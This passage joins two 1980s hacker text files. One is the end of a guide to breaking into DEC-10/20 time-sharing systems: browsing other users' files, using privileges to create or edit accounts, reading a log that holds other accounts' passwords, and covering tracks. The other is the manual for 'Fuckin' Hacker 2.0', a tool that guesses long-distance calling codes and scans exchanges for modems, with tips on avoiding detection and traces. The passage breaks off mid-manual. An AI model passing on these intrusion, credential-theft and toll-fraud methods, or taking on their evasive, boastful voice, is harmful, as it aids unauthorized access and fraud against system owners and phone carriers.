COMPILED PROGRAM THAT CAN BE RUN (JUST BY TYPING ITS NAME AT THE @).  TXT IS A
TEXT FILE, WHICH YOU CAN SEE BY TYPING= > TYPE XXXXX.TXT DO NOT TRY TO=> TYPE
XXXXX.EXE THIS IS VERY BAD FOR YOUR TERMINAL AND WILL TELL YOU ABSOLUTLY
NOTHING.  DAT IS DATA THEY HAVE SAVED.	BAS IS A BASIC PROGRAM, YOU CAN HAVE
IT TYPED OUT FOR YOU.  CMD IS A COMMAND TYPE FILE, A LITTLE TOO COMPLICATED TO
GO INTO HERE.  TRY => TAKE XXXXX.CMD BY THE WAY, THERE ARE OTHER USERS OUT
THERE WHO MAY HAVE FILES YOU CAN USE (GEE, WHY ELSE AM I HERE?).  TYPE => DIR
<*.*> (DEC 20) => DIR [*,*] (DEC 10) * IS A WILDCARD, AND WILL ALLOW YOU TO
ACCESS THE FILES ON OTHER ACCOUNTS IF THE USER HAS IT SET FOR PUBLIC ACCESS.
IF IT ISN'T SET FOR PUBLIC ACCESS, THEN YOU WON'T SEE IT.  TO RUN THAT PROGRAM:
DEC=> @ YOU=> USERNAME PROGRAM-NAME USERNAME IS THE DIRECTORY YOU SAW THE FILE
LISTED UNDER, AND FILE NAME WAS WHAT ELSE BUT THE FILE NAME?  ** YOU ARE NOT
ALONE ** REMEMBER, YOU SAID (AT THE VERY START) SY SHORT FOR SYSTAT, AND HOW
WE SAID THIS SHOWED THE OTHER USERS ON THE SYSTEM?  WELL, YOU CAN TALK TO THEM,
OR AT LEAST SEND A MESSAGE TO ANYONE YOU SEE LISTED IN A SYSTAT.  YOU CAN DO
THIS BY:  DEC=> THE USER LIST (FROM YOUR SYSTAT) YOU=> TALK USERNAME (DEC 20)
SEND USERNAME (DEC 10) TALK ALLOWS YOU AND THEM IMMEDIATE TRANSMISSION OF
WHATEVER YOU/THEY TYPE TO BE SENT TO THE OTHER.  SEND ONLY ALLOW YOU ONE
MESSAGE TO BE SENT, AND ONLY AFTER YOU HIT <RETURN>.  WITH SEND, THEY WILL
SEND BACK TO YOU, WITH TALK YOU CAN JUST KEEP GOING.  BY THE WAY, YOU MAY BE
NOTICING WITH THE TALK COMMAND THAT WHAT YOU TYPE IS STILL ACTED UPON BY THE
PARSER (CONTROL PROGRAM).  TO AVOID THE CONSTANT ERROR MESSAGES TYPE EITHER:
YOU=> ;YOUR MESSAGE YOU=> REM YOUR MESSAGE THE SEMI-COLON TELLS THE PARSER THAT
WHAT FOLLOWS IS JUST A COMMENT.  REM IS SHORT FOR 'REMARK' AND IGNORES YOU
FROM THEN ON UNTIL YOU TYPE A CNTRL-Z OR CNTRL-C, AT WHICH POINT IT PUTS YOU
BACK IN THE EXEC MODE.	TO BREAK THE CONNECTION FROM A TALK COMMAND TYPE:
YOU=> BREAK PRIV'S:  IF YOU HAPPEN TO HAVE PRIVS, YOU CAN DO ALL SORTS OF
THINGS.  FIRST OF ALL, YOU HAVE TO ACTIVATE THOSE PRIVS.  YOU=> ENABLE THIS
GIVES YOU A $ PROMPT, AND ALLOWS YOU TO DO THIS:  WHATEVER YOU CAN DO TO YOUR
OWN DIRECTORY YOU CAN NOW DO TO ANY OTHER DIRECTORY.  TO CREATE A NEW ACCT.
USING YOUR PRIVS, JUST TYPE = > BUILD USERNAME IF USERNAME IS OLD, YOU CAN EDIT
IT, IF IT IS NEW, YOU CAN DEFINE IT TO BE WHATEVER YOU WISH.  PRIVACY MEANS
NOTHING TO A USER WITH PRIVS.  BY THE WAY, THERE ARE VARIOUS LEVELS OF PRIVS:
OPERATOR, WHEEL, CIA WHEEL IS THE MOST POWERFUL, BEING THAT HE CAN LOG IN FROM
ANYWHERE AND HAVE HIS POWERS.  OPERATORS HAVE THEIR POWER BECAUSE THEY ARE AT
A SPECIAL TERMINAL ALLOWING THEM THE PRIVS.  CIA IS SHORT FOR 'CONFIDENTIAL
INFORMATION ACCESS', WHICH ALLOWS YOU A LOW LEVEL AMOUNT OF PRIVS.  NOT TO
WORRY THOUGH, SINCE YOU CAN READ THE SYSTEM LOG FILE, WHICH ALSO HAS THE
PASSWORDS TO ALL THE OTHER ACCOUNTS.  TO DE-ACTIVATE YOUR PRIVS, TYPE YOU=>
DISABLE

WHEN YOU HAVE PLAYED YOUR GREEDY HEART OUT, YOU CAN FINALLY LEAVE THE SYSTEM
WITH THE COMMAND=> LOGOUT THIS LOGS THE JOB YOU ARE USING OFF THE SYSTEM
(THERE MAY BE VARIENTS OF THIS SUCH AS KJOB, OR KILLJOB).  BY THE WAY, YOU CAN
SAY (IF YOU HAVE PRIVS) => LOGOUT USERNAME AFL KILLS THE USERNAME'S TERMINAL.

THERE ARE MANY MORE COMMANDS, SO TRY THEM OUT.	JUST REMEMBER:	LEAVE THE
ACCOUNT IN THE SAME STATE AS YOU FOUND IT.  THIS WAY THEY MAY NEVER KNOW THAT
YOU ARE PLAYING LEECH OFF THEIR ACCT.  NEXT TIME:  THE BASICS OF HACKING II:  V
AX'S (UNIX)
******************************************************************************
	      THIS ARTICLE WRITTEN BY:	THE KNIGHTS OF SHADOW
******************************************************************************
[END] 1984
����������������������������������������������������������������������������

Documentation for Fuckin’ Hacker 2.0, by Hypnocosm (June 10, 1987)


                            Fuckin' Hacker 2.0
                            ~~~~~~  ~~~~~~ ~~~

                            A 2AF Presentation

                           Written by: Hypnocosm

                          Released: June 10, 1987

                       "It's just a fuckin' hacker!"

AN OVERVIEW

  Fuckin' Hacker is a code-hacking piece of software. Anyone who does not
know much about phreaking should NOT use this program. It is designed for
the experienced phreak as a tool to aid him in his telephone endeavors, and
to save him a little money in the process.

  Fuckin' Hacker is written to be used with an IBM PC,XT or AT (or clone,
of course) with a Hayes compatible modem. It only supports up to 2400 baud,
but there's no real gain in hacking at speeds higher than 1200, anyway, due
to the lack of higher baud dialups, and the CPU speed limitations.

  Fuckin' Hacker offers a wide range of capabilities. It has multiple dialup
hacking, using multiple targets, and even long distance hacking. (A feature
most other hackers are still lacking). It is not brute force program, but is
designed instead for the 'paranoid' phreak, living under ESS or worse, who is
in need of codes, yet must obtain them with as little risk as possible.
Hacking multiple dialups, sometimes through a LD service, with random target
numbers is the most risk-free way to hack. It gives LD companies little
indication that any hacking is taking place at all, and reduces your chances
of being 'traced' while in the act. Put it this way, no one I know has ever
been busted for using Fuckin' Hacker ('FH', for short).

  To run FH, be sure the files FH.COM and FH.000 are in the logged drive
(or directory), then simply type 'FH <ret>'. FH will create any files it
needs as it runs, so leave the disk in the drive until you quit FH.

SETTING UP

  When FH first runs it will read in the configuration from disk. If these
files are not present, they will be created. You will then be dropped off
at the Main Menu. The menus in FH are all in the same format. To choose a
menu option, just use the arrow keys and press return when the option you
desire is highlighted. People with color monitors will see the highlighted
options in a different color than the rest of the menu. Monochrome display
users will see the options in two shades, high and low. If these two shades
are not apparent, adjust the level on your monitor until things become clear.

THE MAIN MENU

The options on the Main Menu are:

    Hacker -    Run the hacker. You must have configured the modem and
                extenders before this option will function.

    Scanner -   Yes, FH has a carrier detect scanner, also. It also requires
                some configuration.

    Terminal -  This is a VERY basic terminal routine in case you find the
                need. If you don't like it, use ProComm. This is a hacker,
                not a piece of communications software.

    Utilities - This is the option you will need to use first. It takes to to
                the Utilities Menu where you will spend most of your time with
                FH. This is the meat of the program.

    Quit      - Quit FH and return to DOS.

  As was stated before, to choose an option on the menu, highlight the option
with the arrow keys, and press return (or the space bar). The first thing you
will need to do is configure, so next up:

THE UTILITIES MENU

The options on the Utilities Menu are:

    Configure Modem   - Takes you to the modem configuration.

    Misc Parameters   - Lets you set the default command line parameters,
                        like Begin and End times, printer, I/O windows, etc.

    Edit Extenders    - This is where you design each extender configuration
                        individually.

    Edit Targets      - This is where you store and edit the targets.

    Edit Valids       - This is where the valid codes for use in LD hacking
                        are stored. You can have the hacker automatically
                        append good codes it finds, but they must be updated
                        and checked for validity.

    Extender Flagging - Allows you to flag any combination of extenders to
                        hack.

    Edit Exchanges    - This is where you enter the exchanges you want to
                        scan for computers to hack into.

    Exchange Flagging - Allows you to flag any combination of exchanges to
                        scan.

    Quit to Main Menu - Self explanatory.

                             Setting it Up to Run
                             --------------------

              First step is to go down to the utilities option and hit
         return.  Ok, now you are faced with a new challenge.  The
         Utilities menu.  Well, lets skip over the formalities and move
         on.  Go to the Configure Modem option (you should be on it), and
         hit return.  Ok, this is where you fix up the program to run
         on your system.  The arrow keys on the numeric keypad will flip
         you around on the possible options. If you don't have a numeric
         keypad, well then you have a lousy keyboard, but you can still hit
         the letter corresponding to the option and end up in the right place.
         Hit return or the space bar to edit that option.

         A) ComPort:

             Set the ComPort to 1 or 2 with the arrow keys.

         B) Maximum Baud:

             Set the baud to the maximum baud your modem can handle. This
             baud rate will NEVER be exceeded no matter what some other setting
             is on. (Extenders and targets have their own baud rates... gee.)

         C) Local Dialing:

             This can be set to tone or pulse.  It is sets what mode of dialing
             the program will use to dial out of your home dialtone. Everything
             will henceforth be dialed in tone. Just in case your system can't
             handle DTMF...

         D) PBX Dialing:

             This is for those of you calling out from a pbx system.  If you
             are, you simply put 'Yes' for that option and then go down one and
             enter the digit (or digits) that you must hit for an outside line.
             If you are not calling from a pbx then you need not worry about
             the Outgoing Digit.

         E) Outgoing digit:

             This is valid only if the above option is set to 'Yes'. It is the
             numbers dialed locally (in pulse or tone) to get a local phone co
             dialtone. In most cases this will be a '9'.

         F) Initial String:

             This is a 'modem command string' which you define. Be sure it is
             valid if you want the hacker to initialize properly. It is there
             for your commands to the modem just to make using the program a
             little better. I would suggest putting the dialing speed and
             advanced command set (if your modem has them (X6)) in here. An
             example string would be: 'ATX6S11=47' which would set your modem
             to detect busy and voice on the line, and dial with a 47 millisec
             delay. If you can't think of anything useful to put in here, just
             set it to 'AT' so the program will initialize properly.

                * NOTE The program sends TWO initialization strings to the
                  modem. The first sets the response codes to numeric, turns
                  off the echo, etc. The actual command string sent is:

                         ATM0H0E0V0Q0S0=0S7=90

                  If the second string you specify counteracts any of these
                  commands the modem will NOT initialize properly and you
                  could be bothered with a lot of headscratching. Do NOT
                  set the Initial String to 'ATZ' or anything using a command
                  in the above string. Use it for dialing speed, or to turn
                  on advanced response codes (such as voice and busy detect).
                  If you are using a 1200 baud modem, that does not support
                  these extra features but needs a command to let the modem
                  return a CONNECT 1200 you will need to set this string to
                  'ATX1' or something. The first built-in initialization
                  string is not user modifiable. If your modem has trouble with
                  some of the commands in it, you may still get things working
                  the hard way by modify the COM file itself so that it will
                  have this built-in string set to something your modem is
                  compatible with. I don't suggest doing this if you don't
                  understand exactly how to go about it. And if you DO modify
                  the COM file (hey, it's yours!) PLEASE do not copy it for
                  anyone else. I think you understand why...

         G) Dialing Delay:

             This can either be Time Delay or Dialtone Detect. Dialtone Detect
             is for those of you who have modems that use the advanced command
             set {W,@} (such as USR's).  The Timed Delay is just that. Dialing
             is done with a timer counting off the seconds. I suggest that you
             use Timed Delay even if your modem supports the advanced command
             set, because different modems and different serial ports tend to
             give different results, and it is better to stick with a sure
             deal.

         H) Modem Type:

             You can set this for either External or Internal.  Meaning if you
             have an internal modem you set it to Internal, and vice versa.
             This is there cause it seems that people with internals have major
             problems with all the other programs of this sort.  We fixed that.
             Don't matter where the modem is, in or out, just setting it for
             the correct type will get you on your way. The program will work
             on some internals whether you set it to Internal or not, but it
             will hack more slowly. If the modem has trouble hanging up set
             this option to Internal

         I) Speaker:

             This just toggles the default for the speaker being on or off.
             The program will run silently with this option set to off.
             Nothing dramatic.

         J) Response codes:

             Finishing off the options is Response Codes.  Response Codes
             brings up its own menu.  There is a list of 12 things.  The first
             11 being the different messages you modem sends to the terminal.
             And the number next to them is the numeric code that the modem
             sends which stands for the message.  Understand? For some reason I
             don't think that is too clear, so let me explain it this way: when
             your modem receives a command string and is able to execute it
             without error, it sends you a numeric code that means "OK".  The
             standard number for "OK" is 0, thus that is what we have the "OK"
             response code set to.  When you get this it will be set to the
             defaults for a USR Courier, which are standard response codes, so
             unless you are using some 6th party modem that you bought from
             the Libyan black market, these should work for you. (But to make
             sure, look up what your response codes are in the owners manual
             for the modem).

                 * NOTE There is no reason to change any of the response codes
                   if your modem simply does not have messages like VOICE or
                   BUSY, etc. Since your modem will not be returning these
                   codes, the program will function normally, never having
                   to deal with the codes being sent. However, you MUST change
                   these numbers if the messages that ARE sent by your modem
                   do not match the codes listed here. For example, if your
                   modem returns an '8' every time it connects at 1200, you
                   will need to set the CONNECT 1200 code to '8' instead of
                   '5'. This is rare, and you will most likely never have
                   to touch this section of the program. Remember, DO NOT
                   change these codes around if the messages your modem DOES
                   return are matched to the right response code. It doesn't
                   MATTER if the VOICE has a response code set for it. If your
                   modem never sends that response code, you will not have to
                   worry about this section at all.

         K) Quit to Utils:

             The 12th command is Quit, it simply brings you back to the
             Utilities menu.  Now go back to the Utilities menu, and we can
             continue with your lesson.

                            Miscellaneous Parameters
                            ------------------------

            This section is where you can set the defaults for the Command
         Line Parameters, or change the values of these parameters while
         running the program. The Command Line Parameters make it easy to
         tell the program what to do without having to flip through menus.
         It also makes it very easy to run the program from batch files.
         (I know of a BBS that every few days, early in the morning, quits
         the BBS program to a batch file which looks for a certain errorlevel
         and runs FH using these parameters to set the quit time etc. and then
         returns to the BBS, as if nothing ever happened.) Here are the
         parameters and what they mean. (For info on how to use them from the
         command line, type "FH ?" for the syntax). You need not use any
         command line parameters to set values which are saved as defaults.
         You need only use them if you want something changed from the default
         value you have chosen.

         A) Vacation Dialing:

             This option is used in conjunction with the begin and end
             times for the hacker. When this is enabled, the program will
             hack until the end time, and then wait until the start time
             AGAIN to begin hacking, over and over. Use this if you are
             away for a week or two, and set it to hack, say, between the
             hours 13:00 and 17:00. (Don't hack late at night if you can
             help it, there's less switchboard traffic, and a better chance
             of some operator noticing the bad codes being dialed.)

         B) I/O windows:

             This just turns on or off the scrolling input and output display
             on the top of the hacking and scanning screens. Some people
             think it looks neat, others think it slows things down. But you
             can turn it on or off as you please.

         C) Printer:

             Setting this value to ON will result in having all good codes,
             or carriers found with the scanner to be dumped to the printer
             as they are discovered.

         D) Quit to DOS:

             This options tells the hacker or scanner to drop to DOS when the
             end time is reached. This allows a batch file to pick up from the
             DOS prompt and go wherever you want it. No errorlevels are used
             to pass messages to the batch file, but if you can think of
             something you want passed, let me know and I'll put it in.

         E) Start Time:

             This is the time you want to begin hacking, or scanning. It
             will be used for either option. Enter the time in 24hr military
             format.

         F) Quit Time:

             This is the time you want the hacking or scanning to stop. If you
             have the Quit to DOS enabled, the program will exit to DOS when
             this time is reached. Or if Vacation Dialing is enabled, when
             this time is reached, hacking or scanned will cease, and a
             message "Waiting until XX:XX (start time) to begin hacking/
             scanning" will appear.

         G) Quit to Utils:

             Sends you back to the Utilities Menu. You will be asked if you
             want to save the values you have entered here as defaults. If
             you want these values to be the same every time you run the
             program, answer "Y", if however, you liked the defaults you had
             before, and you just want to change something this one time,
             answer "N".

                       Adding/Editing/Deleting Extenders
                       ---------------------------------

              Now what you will want to do is add some of your local dial-
         ups to the Extender file.  So go to the Edit Extender option and
         hit return.  Now you should have a big window in the middle of the
         screen which has all the things you can modify for EACH extender
         in it.  What you want to do is look above that, at the command
         line.  That is your menu of possible commands.  You switch between
         the extender that you can edit by hitting the arrow keys as is
         said on the command line.  If you feel you want to modify one of
         the extenders (that is in the EXTENDER.DAT file that comes in the
         original ARC) or one that you have added ('A'), just hit the arrow
         keys till it says it is on the number you want to edit, and type "E"
         (for edit) to edit it.  You can flip through the different things
         and change them... well, I might as well go over them NOW, so here
         goes.

         A) Area Code:

             This one is simple enough.  Put the area code for the extender
             right here.  Enter this even if the number is local and the area
             code should never be dialed. It won't be. But the information is
             necessary when dialing through valid codes. Understand?

         B) Number:

             Another easy one.  As you might think, this is where the phone
             number to the 'service' you wish to hack. This should be 7 digits
             long. If you wish to enter a range of numbers, hit return after
             entering the first number of the range. A dash will then appear
             and you may enter the LAST number in the range. Any number
             within and including these numbers will be hacked. If you do not
             want to enter a range, simply hit return after the dash and all
             will be well.

         C) Dial Mode:

             This one can be set to either Local or Long Distance.  If set to
             Long Distance, it will dial through an extender with a good code
             in VALID.DAT (we will talk about adding good codes to it with the
             Edit Valids option in a little while).  And if it is set to Local
             it will simply dial the extender straight. A good use for Long
             Distance is hacking long distance services and calling some of
             the 950s and PBXs that you don't want to show up in your record.

                   *NOTE:  When hacking 800's it will AUTOMATICALLY
                           add 1800 to the extender while dialing, so you
                           don't need to mess with anything, just set the
                           area code to 800.

         D) Maximum Baud:

             This lets you set the highest baud rate the extender can support.
             This is the highest speed that the extender can handle.  Usually,
             an extender can handle ANY baud, but there are a few exceptions
             (if it is a noisy service, your chances of connecting at 300 are
             better than at 1200 or 2400). Whatever this baud is set to, it
             will never exceed the baud rate in the Modem Configuration.
             This option is linked with E) Minimum Baud.

         E) Minimum Baud:

             This lets you set the lowest baud rate the extender will be
             hacked at. (Targets with baud rate limitations will be taken
             into consideration when matching extenders with targets, so
             do not concern yourself with possible target baud rate
             conflicts.) When dealing with extenders that send 'fake carriers'
             you can set this value to something higher than 300 to overcome
             this problem. This may not always work, but it is usually
             successful.

             This is the digit you must hit in order to get an outside line,
             and it is dialed AFTER the code. The typical Outgoing is 9, but
             it could be anything else, it all depends on the system.

         F) Tone detect:

             This is used in conjunction with the Dialtone Detect in the
             Configure Modem section.  If you have it set to ON in the
             Configure Modem section, then you can use the option here to set
             it on or off for each individual extender, since not every
             extender gives valid dialtones. This option only applies to
             modems which support the dialtone detect feature. ('W').

         G) Answer Delay:

             This is the delay that comes AFTER the extender, and BEFORE the
             code.  It is suggested that you set the speaker on, or listen on
             an extension, and test out the Delay to make sure it is allowing
             enough time for the Extender to answer before it dials the Code
             (if you have option F set to ON, it won't use this delay, it will
             wait for a dialtone before continuing).

         H) Target Delay:

             This is the time that the program will wait for a carrier before
             hanging up the modem and going on to the next try.  This timer
             starts when the target is finished dialing.  Again, you might
             want to turn on the speaker, or listen on an extension, and see
             if this Delay is long enough (meaning the target has time to
             answer before the Delay runs out (of course you will have to set
             option N to a code you know is good, so that you can test the
             Delay)).

         I) Target Prefix:

             This will be dialed before the target, and after the code.  You
             can put commas and W's (for Dialtone Detect) in it.

         J) Code First:

             This one is either Yes or No.  If Yes, then the after the
             Extender is dialed, the Code will come before the Target, but
             on the other hand, if it is No, the Target will come before the
             code.

         K) Hack Mode:

             This is a three possibility option.  It can be Random (which
             picks codes to try COMPLETELY randomly (like the Lottery)),
             Sequential (this is as it sounds, if the code is 382, then next
             one tried will be 383, and then 384 and on like that), and Both
             (this one picks the codes in a sequential order, but the
             increment of the code is random).  So set it according to what
             you feel will do the best in your situation.

         L) Code Length:

             Oh good, an easy one.  This value is how many digits are in the
             code. If the Code Template is being used, this value is ignored.

         M) Code Template:

             This is easily the most complex and powerful option when it
             comes to code generation. This option overrides the code length
             (If this space is blank, codes will be generated according to the
             length entered, but if this option has ANYTHING entered, the code
             length is forgotten, and codes are created according to this
             template, so be careful when devising it.) It works like this.
             You make a string consisting of the digits 0 through 9, the X
             character, the comma (,), and the W character (for dialtone
             detection.  Any numerical digits (0-9) in the template will be
             present in EVERY code generated in the exact same position. Any
             commas in the template will not be in the place of a code digit,
             but will act as a pause when dialing the code (some systems have
             a second dial tone for the second half of the code, etc.) The X
             character signifies a variable digit. Entering a code template
             like 'XXXXX' would be exactly the same as setting the code length
             to 5 and leaving the template clear. The Hack modes apply here
             also. Some sample templates would be: 'XXXX,9,' would be useful
             if you want to try making a template to hack a PBX (instead of
             using the PBX mode of hacking) it would send a 4-digit code, wait
             for two seconds, send an outgoing 9 and wait for two more seconds
             before dialing the target. Or perhaps '1301XXXXXXX' would hack
             calling cards in the 301 area. The code template (except for the
             X's) is entered EXACTLY as the code is sent to the modem dialing
             command string, so be careful with it.

         N) Starting Code:

             This is the Code it will use the next time that this extender is
             used.  You can modify it in order to test out the delays that
             you are responsible for setting. By entering a good code here,
             so that you KNOW that you should make it all the way through to a
             CONNECT of some sort, you can see if you have timed everything
             accurately. This code should match the code template if you have
             set one (rare actually, most extenders are straightforward) and
             commas (,,,,) are legal in the code. If the extender depends on
             the code template, you must make the starting code match the
             template since the first code is not generated by the template.

         O) Code File:

             This is the name of the file that the good codes that are found
             for that particular Extender are stored in. We suggest you keep
             it at the default for the extender (the extender + .COD), but
             feel free to make it whatever the hell you want. If the extender
             dialed is part of a range, the code file will be set for each
             number in the range, and there is nothing you can do here to
             change it.

         P) Add valids:

             If you are real sure about this extender set this option to Yes
             and every good code found will be added onto the VALID.DAT file
             where good codes are kept. These codes are used to dial long
             distance extenders, and the timing here is critical. The target
             delay on the valid code must be set PERFECTLY for this to work
             and unless you have Dialtone Detect enabled on the extenders you
             dial Long Distance it is not recommended that you use this option.
             It does save you a little trouble though.

         Q) Note:

             Another easy one.  This is a little string of text that you can
             use like a small notepad for something about a particular
             Extender.  We use it for what the name of the service is, or who
             owns it.  Nothing real important, but handy, nevertheless.

         S) Flagged:

             This is an important one.  When hacking, the program randomly
             picks which extender to hack for the next pass.  If this is set
             to No, then it won't be included in the computers choice of
             extenders.  Thus, if you don't want to hack a certain Extender,
             set this to option to NO, otherwise, make sure it is Yes if you
             want to hack the Extender.  There is another option at the
             Utilities Menu that allows you to flag/un-flag every extender
             in the Extender file and it is much easier than flipping through
             each extender and changing it. When you A)dd a new extender this
             value defaults to NO and you must remember to flag it if you want
             to hack the extender immediately.

         T) Quit:

             This returns the cursor to the Command line, and you can
             continue on from there.

              Now that you have thoroughly learned all that, you must know that
         that if you use the "A" command from the Command Line, you MUST
         enter the Area Code, Number, and Code Length before you can hack it
         (I mean be real, how can you hack an empty string? eh?).  You must
         also know about Deleting an Extender.  If an extender is not longer
         in service, or you just don't want it in your list anymore, then hit
         the proper arrowkey, until you see that Extender on the screen. Now
         what you want to do it hit "D" for Delete Extender.  It will prompt
         you for a Yes or No, as to whether or not you want to delete it, and
         if you type "Y" it will be removed form the list, otherwise, it stays
         in the list.

                            Edit/Add/Delete Targets
                            -----------------------

              Edit Targets is the third option on Utilities Menu.  When you
         choose it, it will clear the screen, and do just as it does for
         Edit Extenders, except that the window in the middle of the screen
         is smaller, because it doesn't store as much info as EXTENDER.DAT
         does.  But anyway, the Command Line is the same, and so are the
         Commands (duh huh!).  In this window you should see four things:

         A) Area Code:

             Simply put, this is the area code for the target in B.

         B) Number:

             This, of course, is the target.  Not much else you can say
             about it.

         C) Extra Delay:

             This is used in conjunction with Target Delay in the Edit
             Extender routine.  This value (in seconds) is added to the
             Target Delay time for whatever extender you are hacking.  Its
             main use is for LD Targets.  I mean if the target is Long
             Distance, it might take X more seconds for the call to get
             through, thus Extra Delay = X. If this option weren't around,
             it would be impossible to make all the extenders work with all
             the targets. The default value is zero an unless the target
             takes an unusually long time to answer (say it's in British
             Columbia or something) the value should remain at zero.

         D) Maximum Baud:

             This is the MAXIMUM baud at which the Target is capable of
             answering at.  The program compares the Max Baud from the
             Configure Modem, Edit Extender, and Edit Target (this one),
             and will initialize and hack at the LOWEST of those speeds.
             I believe that to be self explanatory, so I wont explain.

         E) Minimum Baud:

             This is the MINIMUM baud to use with this Target. This is
             usually set to 300, but if you happen to find a target that
             won't connect at 300, set it to something higher. Remember,
             no matter what you set the bauds in the extenders and targets
             to, the program will never exceed the baud rate in the Modem
             Configuration.

         F) Quit Edit:

             This option just takes you back to the Edit Target Command Line.

              Just as you "A"dd and "D"elete in the Edit Extender routine,
         you do here.  It is all the same, so no need explaining it.  Now
         on to better things.

                             Edit/Add/Delete Valids
                             ----------------------

              Ok, this is the fourth option on the Utilities Menu.  Lets pick
         it.  You will see the all familiar clearing of the screen (but for
         the border), and the Command Line will appear at the top along
         with a small window.  This one is for Valid Codes.  These are used
         to dial an extender that is marked as Long Distance.  You may want
         to add a lot of these if you are doing some LD hacking.  The
         different fields are as follows:

         A) Number:

             Ok, this is a number to an extender.  That's all. Oh, use common
             sense, of course it must be local or an 800.

         B) Code:

             This is a VALID code for the above number. If a code template was
             used with this extender, use the proper commas or W's in the
             valid code.

         C) Dial Code First:

             Ok, this is another one of them Yes and No options.  It works just
             like the Dial Code First in the Edit Extender routine.  Read about
             it if you didn't bother already.

         D) Answer Delay:

             As you would think, this is the SAME as the Answer Delay in the
             Edit Extender routine, PLEASE look at it if you haven't already,
             or if you have forgotten already.  Thank you.

         E) Target delay:

             This is how many seconds to wait after dialing the target number
             (which in this case is the extender you are hacking) before
             dialing the code. Since most extenders time out if no code is
             dialed after a certain period of time, this length must be set
             VERY precisely. Dialtone detect is recommended.

                   *NOTE:  It is added to the answer delay for whatever
                           Extender you are using.  I actually recommend
                           you set this to 0 and modify the Answer Delay
                           in Edit Extenders, for the Extender you are
                           using.

         F) Quit Edit:

             This is like every other Quit that is in the program, it takes
             you back to the previous menu (in this case, back to the Command
             Line).

              Now as you find more good codes, you are going to want to put
         them in this list.  Well, that is rather simple, just type "A" for
         Add, and then input the information needed.  Also, the codes that
         you have put in there are going to go bad some time, so you will want
         to delete them.  This, once again, is rather simple.  Just type "D"
         at the Command Line, and hit "Y" when it asks for confirmation of the
         deleting.

                                 Flag Extenders
                                 --------------

              Ok, the next routine of the Utilities Menu is Flag Extenders.
         What this allows you to do is toggle the flag on each Extender,
         so that it will (or will not) be used while hacking.  The screen
         should clear, and a window will appear in the middle of the screen.
         This menu will have a list of the Extenders in your extender file,
         along with a "Quit" option, which returns you to the Utilities Menu.
         If you have a lot of Extenders, they wont fit on the screen, so it
         gives you more options.  They are "Next Screen" and "Previous Screen"
         and they will be up as options according to how many Extenders you
         have, and what 'screen' of them you are looking at.  You may use the
         PgUp and PgDn keys to choose the Next and Previous screen options
         instantly. But anyway, you move down until you are on top of the
         extender you want to flag (or un-flag as the case may be), and hit
         return.  If an arrow is pointed at the Extender, it is Flagged,
         otherwise it is not.

                   *NOTE: To save me some time, I'll mention right now that
                          the Exchange Flagging option behaves exactly like
                          this one, but it flags exchanges to scan instead of
                          extenders to hack.

                                Edit Exchanges
                                --------------

            This is where you enter in the exchanges you want to scan for
         carriers with the Scanner. The editing system here is very similar
         to the Extender Editing. I'll assume you all understand how CD
         scanners work and simply give you the explanation of the info you
         must fill in for each one:

         A) Area:

             This is the Area code for the range you are scanning. Enter
             if even if it isn't long distance, just so it looks good.

         B) Exchange:

             This is the first three numbers in any number dialed in this
             range. It is often referred to as the prefix.

         C) Start:

             Here is where you complete the phone number where you will
             start scanning. You enter the last four digits of the FIRST
             number you want to start dialing. This number will increase
             as the scanning progresses.

         D) Quit:

             This is the last four digits of the LAST number to dial.
             If you want to scan the numbers 301-321-0000 to 301-321-9999
             you would enter 301 in the Area (option A), 321 in the Exchange
             (option B), 0000 in Start (option C) and 9999 in Quit (this
             option). Is that confusing enough? Just wait.

        E) Dial Mode:

             This tells the program whether the exchange is long distance or
             local. Use the arrow keys to choose one or the other. If the
             number is local, only the exchange and last 4 digits (start) will
             be dialed to call the number. If it is long distance, then the
             call will first go through a service in the Valid Codes section,
             then dial the area code, exchange and last 4 digits.

         F) Timeout:

             This is a value in seconds that tells the Scanner how long to
             wait for a carrier after each dial. You can set this to anything
             you like, but I recommend about 12-15 seconds for local numbers
             and anywhere from 20 to 30 for long distance exchanges.

         G) Flag:

             Yes, you can flag exchanges the same way you flag extenders to
             hack. You may only want to scan one exchange at a time, or all
             or just a few. It's up to you. You can set the flag on or off
             at this menu, or use the Exchange Flagging (next option on the
             Utilities Menu) to flag any combination quickly.

         H) Quit Edit:

             Sends you back to the Utilities Menu, saving all changes made.

                               Quit to Main Menu
                               -----------------

              Not only does this return to the Main Menu, so you can move
         on to better things, but if you edited something, and that routine
         didn't save it to disk, it is saved here (though most everything is
         saved the second you finish editing it).  Well, time to hit this
         option and return to the Main Menu to continue your tour.

                               The Hacking Screen
                               ------------------

            Here is an explanation of what all that shit on the hacking
         screen means.

         Status   :  This is what the program is doing, and what is going on
                     in response to it.

         Dialed   :  This is the number of attempts you have made since you
                     started.

         Success  :  The number of Good Codes found is here, along with your
                     ration of Dialed vs. Successes (since started hacking).

         Baud     :  This is the baud the program is working at during the
                     call.  It is determined, as I said before, by the lowest
                     rate between the Modem Max, Extender Max, and Target Max.

         Hackmode :  This is just what the Code Generation is for the Extender
                     you are hacking at that moment.

         Extender :  Number of the Extender you are hacking on.

         Number   :  The phone number of the Extender.

         Note     :  This is the Extender Note we talked about earlier.

         Code     :  The code that it is trying is shown here.

         Attempts :  This is the total attempts you have made with the
                     extender you are hacking.

         Success  :  This success is for THE EXTENDER, not for all calls
                     that have been made since hacking has begun.

         Target   :  This is the phone number of the Target that it is using
                     to connect with.

              There are two others that you only see when you are hacking
         Long Distance, they are:

         Using :  One of the Extenders in the file VALID.DAT.

         Code  :  The Code that goes along with the above Extender.

              There are a few other things you should notice.  In the top
         right corner of the screen, there will be a timer that counts down
         the delays.  In the top left corner is the time and date (you should
         have noticed that by now).  Below the window there is a small list of
         commands.  They are just as they say.  Hit "S" to toggle the speaker
         on/off, hit the space bar to cycle onto the next pass, and hitting
         the escape key will abort hacking and return to the Main Menu. If you
         set the program to quit to dos, and aborted with a keypress, the quit
         to dos option will be ignored. That is really all there is to it,
         so lets have our closing remarks.

                                    Quit to DOS
                                    -----------

              If you pick this option, it will do as it says. After the time
         for Hacking Quit time has rolled around, the program will stop
         hacking, leave the Hacking Window, show you the credits, CLEAR the
         screen, and Quit to DOS where a batch file can regain control and
         dump your codes to the printer or whatever you want it to do. This
         option was put in because someone wanted to hack all night until 6 AM
         when his parents woke up, but didn't want the Hacker to be on the
         screen. They bitched that he left the computer on, but were none the
         wiser. Although this situation may not apply to you, the usefulness
         of having a batch file take over after running the Hacker justifies
         this option.

                                 Idiosyncrasies
                                 --------------

              Every program has its own 'quirks', so I will inform you of the
